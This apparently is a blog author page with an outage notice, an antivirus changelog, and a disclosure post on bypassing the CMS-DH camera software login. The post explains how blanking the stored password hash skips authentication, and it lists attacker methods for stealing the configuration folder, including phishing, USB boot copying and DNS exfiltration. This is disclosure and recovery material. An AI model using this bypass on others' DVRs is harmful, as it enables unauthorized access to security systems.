All posts by Justin Grimes

(@zelon88) - The founder, lead developer, and DPO for HonestRepair.

Service Outages Due To Network Upgrades (Updated)

It’s once again time to reconfigure our ever-growing storage arrays. With about 2 days worth of backup capacity remaining I have bought new backup storage and am in the process of copying everything over.

Once the initial data transfer is complete I will disable the Cloud by enabling “Maintenance Mode” and give it one quick sync. Then I will reconfigure the Cloud to run with one backup copy as primary. This will allow me to disable maintenance mode and resume public Cloud operations with one backup acting as the primary Data store and the other backup copy as a backup.

With the Cloud operating out of backup storage I can reconfigure the primary Cloud Data array without worrying about redundancy or the clock ticking. After the primary Cloud Data array is rebuilt I can sync it with the temporary primary data and recycle the extra disks back into the primary Cloud Data array for added redundancy.

The tl;dr is: our service might be spotty this weekend. We will do our best to keep the platform online and stable but there are times when we will need to take things offline for short periods. Please pardon these outages while we work to expand our capabilities and improve our services.

Update 4/30/2019

The upgrade is mostly complete and the platform is stable. There were several compatibility hiccups that prevented configuring the main storage arrays the way I wanted but I’ve ordered a new RAID controller that should hopefully do the trick when it gets here. In the meantime we’re running the Cloud out of backup storage. There will be a little bit of downtime involved when installing the new RAID controller and the Cloud will be briefly unavailable during the changeover. The upgrade is about 75% complete. Thanks for sticking with us, and keep checking back for more updates!

Update 5/6/2019

I received the RAID parts and will be installing them this week. Expect downtime in the evenings all this week while I get the hardware configured and work out the kinks.

Update 5/16/2019

The upgrade is complete and testing has passed. The Cloud has been off backup storage and running out of a new primary storage array since this past weekend, but I kept a close eye on everything for the first few days before calling it complete. The new RAID controller and drives seem to be working well and there are no signs of problems. The new configuration is also more robust than before. Our primary storage array can withstand multiple simultaneous drive failures without losing any user-supplied data and the new backup array adds yet another layer of redundancy. The OS drive on this server was also upgraded to a unit that yields a 10x performance boost over the last configuration. That’s right, our new OS storage configuration is ten times faster than before, with sub-0.5ms random seek time and up to 3GB/s of disk transfer.
This also frees up hardware that can eventually be installed into other HonestRepair servers, further enhancing our capabilities. Before I get around to that I think I want to install an onboard LCD touch screen on out DNS/DHCP server, and possibly write a How-To about it. Stay tuned!

CMS-DH Admin Login Bypass

BACKGROUND

This information is also available on Github.

CMS-DH is an old generic application created for resale, probably by Dahua or one of it’s divisions. It is used to control Digimerge security cameras. Now Flir owns Digimerge and everybody wants to forget this software exists. In reality it doesn’t matter and I don’t really care. There are configuration entries to change the name of the application in toolbar menu’s, so that should give you an idea of how generic it was meant to be.

If you lose access to CMS-DH it can be extremely difficult to connect to the DVR and make changes to it. The documentation for Digimerge hardware is practically non-existent, and the company itself doesn’t exist anymore (now absorbed into Flir Security, who don’t even have a TLS cert on their security-centric website). The lack of information presents a problem that is compounded by the fact that there seem to be different versions of documentation out there for the Digimerge equipment and not many of them seem to have accurate or useful information.

Luckily, the hardware uses CMS-DH to make configuration changes from a computer. CMS-DH is what I like to call “third world software” meaning that it was written without any consideration for security, nobody wants to own support for it, and it hangs all it’s secrets out there in the open.

GAINING ACCESS

This hack was tested to work with…..

App Version: 1.8.8.24

Service Version: 1.8.8.10

Codec Version: 3.0.2.3

Download Dll Version: 3.0.0.1

…..Although I’m not sure of a way to find this info until you log in at least once.

CMS-DH stores configuration data in C:\Users\USERNAME\Documents\CMS-DH. The “.ems” files in this folder contain the configuration data for CMS-DH and can be opened in Notepad or any other text editor.

In order for the hack to work, you must have a copy of CMS-DH installed and configured with devices and an admin connection to a DVR. This hack will only give you access to CMS-DH. If CMS-DH is connected to devices (using the device password) you will have access those devices once you gain access to CMS-DH. If CMS-DH is not connected to any devices this won’t get you anywhere. This hack is only valuable on a pre-configured CMS-DH that you do not have credentials for.

To gain access to CMS-DH without valid login credentials you must open “registry.ems” with a text editor and locating the “PASSWORD=” line.

The “PASSWORD=” line contains the user password in hashed form. If you look a little further down you’ll see another line that starts with “LOGINAC=” followed by a plain text username.

Start by backing up “Registry.ems” and then wipe out the hashed password string from the “PASSWORD=” line. So “PASSWORD=54883fsdf83nn2nb4” would become simply “PASSWORD=”. Save the file and launch CMS-DH. It will start the application and bypass the login screen.

STEALING CREDENTIALS

We know that an attacker can wipe out the cached password from CMS-DH and that it will completely skip the login screen. An attacker can leverage this to gain access to DVR’s they shouldn’t have authorization to by obtaining a copy of someone else’s CMS-DH config directory. Because all the config data for devices are stored in the CMS-DH config directory, a successful attacker would have everything they need to log into gain unauthorized access to a local security system.

Possible attack vectors for stealing the directory include…..

  1. Phishing the user and convincing them to send you CMS-DH “log files.”
  2. Misconfigured Windows Share.
  3. Boot to USB and copy/paste unencrypted HDD contents.
  4. Make the user run a script which dumps the contents of the CMS-DH directory somewhere.
  5. Gain access to the machine (physical or remote) and exfiltrate the files to a CNC server.
  6. The files are small enough to exfiltrate through a DNS TXT query.

HRScan2 v1.6 – PHP-AV App to v3.9. Defs to v4.7. Add SHA1 detection

-v1.6.
-PHP-AV App to v3.9. Defs to v4.7.
-Add support for SHA1 hash detection ($data3, $virus[4]).
-Add code detection for lots of malicious files. 
-Includes malicious code samples for Golang, Python, C++, node.js, Java, Javascript, PowerShell, Ruby, VBS & more.
-Fix obscenely large logfiles by removing filename logging during scanning.
-To continue logging filenames like before (and generate really large log files) set $CONFIG['debug'] = True;
-Fixed indented code blocks.